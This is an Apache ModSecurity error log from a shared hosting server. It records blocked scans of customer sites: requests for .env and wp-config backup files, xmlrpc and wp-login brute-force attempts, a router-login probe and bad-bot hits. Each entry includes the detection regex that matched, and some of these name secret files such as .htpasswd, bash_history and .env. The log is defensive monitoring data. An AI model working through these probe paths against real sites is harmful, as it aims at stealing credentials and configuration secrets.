[Tue May 26 13:42:18.548393 2026] [security2:error] [pid 536875:tid 537076] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV4ur_-FTveSGlx1HzMgAAAMw"]
[Tue May 26 13:42:18.820230 2026] [security2:error] [pid 544395:tid 544649] [client 106.192.248.115:50659] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVV4hmrs7g3RMCdp8XVoAAAAHw"]
[Tue May 26 13:42:18.824810 2026] [security2:error] [pid 544395:tid 544649] [client 106.192.248.115:50659] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVV4hmrs7g3RMCdp8XVoAAAAHw"]
[Tue May 26 13:42:20.002427 2026] [security2:error] [pid 544395:tid 544561] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV4xmrs7g3RMCdp8XVrQAAACQ"]
[Tue May 26 13:42:21.930788 2026] [security2:error] [pid 544395:tid 544647] [client 64.233.173.232:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVV5Rmrs7g3RMCdp8XVywAAAHo"]
[Tue May 26 13:42:22.207220 2026] [security2:error] [pid 544395:tid 544510] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/.env.backup"] [unique_id "ahVV5hmrs7g3RMCdp8XV3gAAd3I"]
[Tue May 26 13:42:22.379889 2026] [security2:error] [pid 544395:tid 544556] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV5Rmrs7g3RMCdp8XV2wAAAB8"]
[Tue May 26 13:42:22.482162 2026] [security2:error] [pid 544395:tid 544537] [client 47.128.47.142:18298] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cicodev.org"] [uri "/robots.txt"] [unique_id "ahVV5hmrs7g3RMCdp8XV5gAAAAw"]
[Tue May 26 13:42:23.063527 2026] [security2:error] [pid 536875:tid 537018] [client 181.116.178.165:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV5ur_-FTveSGlx1HzYAAAAJI"]
[Tue May 26 13:42:23.319031 2026] [security2:error] [pid 544395:tid 544509] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/.env.old"] [unique_id "ahVV5xmrs7g3RMCdp8XV9AAAc3E"]
[Tue May 26 13:42:23.602918 2026] [security2:error] [pid 544395:tid 544516] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/.env.bak"] [unique_id "ahVV5xmrs7g3RMCdp8XV_gAATHg"]
[Tue May 26 13:42:23.967771 2026] [security2:error] [pid 544395:tid 544523] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/config/.env"] [unique_id "ahVV5xmrs7g3RMCdp8XWAgAAS38"]
[Tue May 26 13:42:24.350416 2026] [security2:error] [pid 544395:tid 544402] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/app/.env"] [unique_id "ahVV6Bmrs7g3RMCdp8XWAwAAYwY"]
[Tue May 26 13:42:24.402286 2026] [security2:error] [pid 536875:tid 537040] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV5-r_-FTveSGlx1HzbwAAAKg"]
[Tue May 26 13:42:24.849521 2026] [security2:error] [pid 544395:tid 544397] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/src/.env"] [unique_id "ahVV6Bmrs7g3RMCdp8XWFAAADgE"]
[Tue May 26 13:42:25.232315 2026] [security2:error] [pid 544395:tid 544608] [client 77.68.9.24:57232] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.9.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/images/images/cache.php"] [unique_id "ahVV6Rmrs7g3RMCdp8XWGAAAAFM"], referer: www.google.com
[Tue May 26 13:42:25.267433 2026] [security2:error] [pid 544395:tid 544411] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/backend/.env"] [unique_id "ahVV6Rmrs7g3RMCdp8XWGQAAJQ8"]
[Tue May 26 13:42:26.525417 2026] [security2:error] [pid 544395:tid 544642] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV6hmrs7g3RMCdp8XWLwAAAHU"]
[Tue May 26 13:42:26.576479 2026] [security2:error] [pid 544395:tid 544399] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/api/.env"] [unique_id "ahVV6hmrs7g3RMCdp8XWPQAAEQM"]
[Tue May 26 13:42:27.249397 2026] [security2:error] [pid 544395:tid 544522] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "divinternationalcourier.in"] [uri "/config.php"] [unique_id "ahVV6xmrs7g3RMCdp8XWUAAAVX4"]
[Tue May 26 13:42:27.455684 2026] [security2:error] [pid 544395:tid 544590] [client 198.177.125.186:53902] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "208.91.198.85"] [uri "/"] [unique_id "ahVV6xmrs7g3RMCdp8XWUQAAAEE"]
[Tue May 26 13:42:27.678228 2026] [security2:error] [pid 544395:tid 544570] [client 198.177.125.186:60156] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "208.91.198.85"] [uri "/"] [unique_id "ahVV6xmrs7g3RMCdp8XWXAAAAC0"]
[Tue May 26 13:42:27.757305 2026] [security2:error] [pid 544395:tid 544543] [client 129.222.147.134:21936] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVV6xmrs7g3RMCdp8XWWAAAABI"]
[Tue May 26 13:42:27.757463 2026] [security2:error] [pid 544395:tid 544543] [client 129.222.147.134:21936] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVV6xmrs7g3RMCdp8XWWAAAABI"]
[Tue May 26 13:42:28.118470 2026] [security2:error] [pid 536875:tid 537079] [client 43.134.94.213:22924] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ivwellnessresources.org"] [uri "/"] [unique_id "ahVV7Or_-FTveSGlx1HzhgAAAM8"]
[Tue May 26 13:42:28.118573 2026] [security2:error] [pid 536875:tid 537079] [client 43.134.94.213:22924] ModSecurity: Warning. Matched phrase "Sogou web spider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ivwellnessresources.org"] [uri "/"] [unique_id "ahVV7Or_-FTveSGlx1HzhgAAAM8"]
[Tue May 26 13:42:28.128227 2026] [security2:error] [pid 544395:tid 544563] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV6xmrs7g3RMCdp8XWXwAAACY"]
[Tue May 26 13:42:28.264931 2026] [security2:error] [pid 544395:tid 544519] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "divinternationalcourier.in"] [uri "/settings.php"] [unique_id "ahVV7Bmrs7g3RMCdp8XWZgAAOXs"]
[Tue May 26 13:42:28.986163 2026] [security2:error] [pid 544395:tid 544520] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "divinternationalcourier.in"] [uri "/wp-config.php"] [unique_id "ahVV7Bmrs7g3RMCdp8XWbgAAUHw"]
[Tue May 26 13:42:29.296232 2026] [security2:error] [pid 544395:tid 544627] [client 106.192.248.115:50971] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVV7Rmrs7g3RMCdp8XWdAAAAGY"]
[Tue May 26 13:42:29.296360 2026] [security2:error] [pid 544395:tid 544627] [client 106.192.248.115:50971] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVV7Rmrs7g3RMCdp8XWdAAAAGY"]
[Tue May 26 13:42:29.797275 2026] [security2:error] [pid 544395:tid 544578] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV7Rmrs7g3RMCdp8XWeQAAADU"]
[Tue May 26 13:42:29.803282 2026] [security2:error] [pid 544395:tid 544637] [client 77.68.9.24:51135] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.9.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/images/images/cache.php"] [unique_id "ahVV7Rmrs7g3RMCdp8XWgAAAAHA"], referer: www.google.com
[Tue May 26 13:42:30.385710 2026] [security2:error] [pid 544395:tid 544398] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "divinternationalcourier.in"] [uri "/config.php.bak"] [unique_id "ahVV7hmrs7g3RMCdp8XWkQAAEgI"]
[Tue May 26 13:42:31.386258 2026] [security2:error] [pid 544395:tid 544408] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "divinternationalcourier.in"] [uri "/wp-config.php.backup"] [unique_id "ahVV7xmrs7g3RMCdp8XWpAAAEAw"]
[Tue May 26 13:42:31.709595 2026] [security2:error] [pid 536875:tid 537111] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV7-r_-FTveSGlx1HzowAAAO8"]
[Tue May 26 13:42:32.430823 2026] [security2:error] [pid 544395:tid 544413] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "divinternationalcourier.in"] [uri "/wp-config.php.bak"] [unique_id "ahVV8Bmrs7g3RMCdp8XWuAAAVxE"]
[Tue May 26 13:42:32.679931 2026] [security2:error] [pid 544395:tid 544406] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "divinternationalcourier.in"] [uri "/wp-config.php.old"] [unique_id "ahVV8Bmrs7g3RMCdp8XWvAAAAgo"]
[Tue May 26 13:42:32.943616 2026] [security2:error] [pid 544395:tid 544414] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "divinternationalcourier.in"] [uri "/wp-config.php.save"] [unique_id "ahVV8Bmrs7g3RMCdp8XWvwAAZxI"]
[Tue May 26 13:42:33.205088 2026] [security2:error] [pid 544395:tid 544425] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "divinternationalcourier.in"] [uri "/wp-config.php.swp"] [unique_id "ahVV8Rmrs7g3RMCdp8XWwwAATB0"]
[Tue May 26 13:42:33.479808 2026] [security2:error] [pid 544395:tid 544428] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "divinternationalcourier.in"] [uri "/wp-config.php.txt"] [unique_id "ahVV8Rmrs7g3RMCdp8XWxgAANyA"]
[Tue May 26 13:42:34.093134 2026] [security2:error] [pid 544395:tid 544584] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV8Rmrs7g3RMCdp8XWzQAAADs"]
[Tue May 26 13:42:34.355013 2026] [security2:error] [pid 536875:tid 537077] [client 72.255.19.150:29167] ModSecurity: Warning. Match of "ipMatch 127.0.0.1,::1" against "REMOTE_ADDR" required. [file "/etc/httpd/modsecurity.d/00_asl_zz_strict.conf"] [line "82"] [id "331030"] [rev "2"] [msg "Atomicorp.com WAF Rules: Suspicious activity detected - HTTP Request Missing a Host Header"] [severity "NOTICE"] [tag "no_ar"] [hostname "md-74.webhostbox.net"] [uri "/boaform/admin/formLogin"] [unique_id "ahVV8ur_-FTveSGlx1HzxAAAAM0"]
[Tue May 26 13:42:34.483669 2026] [security2:error] [pid 536875:tid 537077] [client 72.255.19.150:29167] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahVV8ur_-FTveSGlx1HzxAAAAM0"]
[Tue May 26 13:42:35.429799 2026] [security2:error] [pid 544395:tid 544583] [client 3.237.65.43:52122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 43.65.237.3.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "avprealty.com"] [uri "/images/images/cache.php"] [unique_id "ahVV8xmrs7g3RMCdp8XW5wAAADo"], referer: www.google.com
[Tue May 26 13:42:35.759698 2026] [security2:error] [pid 544395:tid 544448] [remote 23.79.233.44:44985] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "panda-eco.com"] [uri "/"] [unique_id "ahVV8xmrs7g3RMCdp8XW8gAAQjQ"]
[Tue May 26 13:42:35.880944 2026] [security2:error] [pid 544395:tid 544566] [client 85.208.96.208:11346] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/nerf/day/2026-04-23/"] [unique_id "ahVV8xmrs7g3RMCdp8XW9wAAACk"]
[Tue May 26 13:42:35.881103 2026] [security2:error] [pid 544395:tid 544566] [client 85.208.96.208:11346] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/nerf/day/2026-04-23/"] [unique_id "ahVV8xmrs7g3RMCdp8XW9wAAACk"]
[Tue May 26 13:42:35.971429 2026] [security2:error] [pid 544395:tid 544560] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV8xmrs7g3RMCdp8XW7QAAACM"]
[Tue May 26 13:42:37.955111 2026] [security2:error] [pid 544395:tid 544544] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV9Rmrs7g3RMCdp8XXGAAAABM"]
[Tue May 26 13:42:37.986288 2026] [security2:error] [pid 544395:tid 544629] [client 129.222.147.134:40929] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVV9Rmrs7g3RMCdp8XXJwAAAGg"]
[Tue May 26 13:42:37.988189 2026] [security2:error] [pid 544395:tid 544629] [client 129.222.147.134:40929] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVV9Rmrs7g3RMCdp8XXJwAAAGg"]
[Tue May 26 13:42:39.793829 2026] [security2:error] [pid 544395:tid 544420] [remote 216.185.214.209:51258] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.214.185.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVV9xmrs7g3RMCdp8XXRgAAKxg"]
[Tue May 26 13:42:39.852021 2026] [security2:error] [pid 536875:tid 537074] [client 106.192.248.115:51271] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVV9-r_-FTveSGlx1H0CgAAAMo"]
[Tue May 26 13:42:39.852158 2026] [security2:error] [pid 536875:tid 537074] [client 106.192.248.115:51271] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVV9-r_-FTveSGlx1H0CgAAAMo"]
[Tue May 26 13:42:40.150713 2026] [security2:error] [pid 544395:tid 544643] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV9xmrs7g3RMCdp8XXTwAAAHY"]
[Tue May 26 13:42:40.291944 2026] [security2:error] [pid 544395:tid 544418] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/web.config"] [unique_id "ahVV-Bmrs7g3RMCdp8XXVQAAUxY"]
[Tue May 26 13:42:41.704233 2026] [security2:error] [pid 536875:tid 537057] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV-er_-FTveSGlx1H0FQAAALk"]
